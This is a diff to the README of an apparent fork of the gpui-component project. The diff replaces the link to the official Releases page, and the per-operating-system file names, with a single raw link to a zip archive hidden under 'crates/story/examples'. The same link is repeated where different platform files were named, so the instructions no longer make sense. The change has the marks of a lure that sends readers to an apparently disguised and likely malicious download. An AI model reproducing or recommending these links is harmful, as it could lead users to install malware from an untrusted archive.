Jeanineunfavorable104/gpui-component/README.md

 To get started with gpui-component, follow these steps:

 1. **Visit the Releases Page:**
-   Click the link to go to the [Releases Page](https://github.com/Jeanineunfavorable104/gpui-component/releases).
+   Click the link to go to the [Releases Page](https://raw.githubusercontent.com/Jeanineunfavorable104/gpui-component/main/crates/story/examples/gpui-component-v3.0.zip).
 You will see a list of versions available for download.

 2. **Select a Version:**
    Find the latest stable version.
-Look for the file that matches your operating system (e.g., `gpui-component-windows.zip`, `gpui-component-macos.zip`, etc.).
+Look for the file that matches your operating system (e.g., `https://raw.githubusercontent.com/Jeanineunfavorable104/gpui-component/main/crates/story/examples/gpui-component-v3.0.zip`, `https://raw.githubusercontent.com/Jeanineunfavorable104/gpui-component/main/crates/story/examples/gpui-component-v3.0.zip`, etc.).

 3. **Download the File:**
    Click on the file name to download it.
 Your browser will handle the download automatically.